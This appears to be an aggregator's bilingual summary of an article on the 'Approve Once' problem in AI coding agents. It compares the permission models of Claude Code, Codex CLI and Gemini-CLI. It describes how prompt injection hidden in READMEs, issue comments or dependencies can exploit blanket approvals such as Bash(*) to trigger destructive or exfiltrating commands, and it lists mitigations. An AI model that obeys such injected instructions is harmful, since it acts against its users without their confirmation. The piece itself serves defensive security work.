Claude Code・Codex・Gemini-CLIの「Approve Once」問題と信頼永続化対策 An analysis of the 'approve once' trust persistence problem in AI coding agents like Claud…

Zenn MCP tag · zenn.dev · 2026/05/09 14:24 · 1d ago · 📖 2 min

AI 3 行サマリ

AIコーディングエージェントの「一度承認すると永続的に信頼される」設計が抱える危険性を整理した記事。
Claude Code、Codex、Gemini-CLIの各実装を比較し、プロンプトインジェクションや意図しないコマンド実行への対策を解説する。

English summary

An analysis of the 'approve once' trust persistence problem in AI coding agents like Claude Code, Codex, and Gemini-CLI, comparing their permission models and suggesting countermeasures against prompt injection and unintended command execution.

AIコーディングエージェントの普及に伴い、ユーザーが一度承認した操作を以降は無確認で実行する「Approve Once」設計の危険性が注目されている。本記事はClaude Code、OpenAI Codex CLI、Google Gemini-CLIにおける承認・信頼の永続化メカニズムを横断的に比較し、運用上のリスクと対策を整理したものである。

各ツールはユーザーの煩雑さを下げるため、特定コマンドやディレクトリへのアクセスを「常に許可」する仕組みを備える。しかしこの設定は、悪意あるREADMEや依存パッケージに仕込まれたプロンプトインジェクションによって悪用される可能性がある。例えば一度`git`や`npm`の実行を全面許可すると、エージェントが外部から注入された指示に従って意図しないリポジトリ操作やパッケージインストールを行う余地が生まれる。

記事では、Claude Codeの`allowedTools`設定、Codex CLIのサンドボックスモード、Gemini-CLIの権限スコープといった各実装の差異を具体的に示し、ワイルドカード許可の回避、コマンド単位での粒度制御、信頼境界をプロジェクトごとに分けるといった実践的な緩和策を提示している。

Claude Code、Codex、Gemini-CLIの各実装を比較し、プロンプトインジェクションや意図しないコマンド実行への対策を解説する。

🔗 MCP · 本記事のポイント

背景として、2025年以降AnthropicやOpenAIがエージェント実行環境のサンドボックス化を強化しており、Devcontainer連携やネットワーク隔離オプションが標準化されつつある。一方でGitHub上ではAIエージェントを標的にしたプロンプトインジェクションPoCも複数公開されており、信頼モデルの再設計が業界課題となっている可能性がある。利便性とセキュリティのトレードオフをどこに置くかは、各開発者の運用ポリシー次第と言えるだろう。

As AI coding agents become a daily tool for developers, a subtle but serious design issue has surfaced: once a user approves a command or tool, many agents treat that approval as permanent. This article surveys how Claude Code, OpenAI's Codex CLI, and Google's Gemini-CLI handle trust persistence, and outlines the risks and mitigations around the so-called 'Approve Once' problem.

To reduce friction, each agent offers an option to permanently allow specific commands, directories, or tool categories. The convenience is real, but so is the attack surface. A blanket approval for tools like git, npm, or shell execution means that any prompt injection hidden in a README, issue comment, or transitive dependency could trigger destructive or exfiltrating actions without further user confirmation. The agent will faithfully follow instructions it believes to be legitimate, even when those instructions originated from untrusted content it merely read.

The author walks through the concrete permission models of each tool. Claude Code exposes an allowedTools configuration with wildcard support; Codex CLI relies on sandbox modes that constrain filesystem and network access; Gemini-CLI scopes permissions per project and per tool. The differences matter: a wildcard like Bash(*) effectively disables the safety layer, while command-specific allowlists such as Bash(git status) preserve much of the protection. Recommended mitigations include avoiding wildcards, splitting trust boundaries per repository, and reviewing persisted approvals periodically.

The broader context is worth noting. Throughout 2025, Anthropic and OpenAI have invested heavily in sandboxing agent execution, with devcontainer integrations and network isolation options becoming more standard. At the same time, several proof-of-concept prompt injection attacks targeting coding agents have circulated on GitHub and security blogs, suggesting that the industry's trust model for autonomous coding tools may need a more fundamental rethink. Some researchers argue that capability-based permissions, similar to mobile OS sandboxes, could replace today's coarse allow/deny prompts, though no consensus has emerged.

For practitioners, the immediate takeaway is to treat persisted approvals as a security configuration, not a convenience setting. Reviewing the settings.json or equivalent file of each agent, removing stale wildcard grants, and running agents inside containers when handling untrusted code are practical steps. As agents gain more autonomy — including background execution and multi-step planning — the cost of an over-permissive approval grows accordingly. The 'Approve Once' problem is unlikely to be solved by a single vendor; it appears to require coordinated changes in UX, sandboxing, and prompt provenance tracking across the ecosystem.